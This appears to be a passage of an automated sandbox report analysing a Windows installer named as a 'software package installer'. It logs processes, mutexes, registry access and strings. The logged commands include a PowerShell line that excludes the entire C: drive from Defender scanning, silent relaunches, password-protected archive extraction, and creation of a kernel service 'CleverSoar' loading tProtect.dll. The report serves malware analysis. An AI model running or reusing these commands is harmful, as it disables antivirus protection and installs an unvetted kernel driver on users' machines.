Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00389252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00389252
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA64050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6CA64050
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-G3Q97.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmpJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
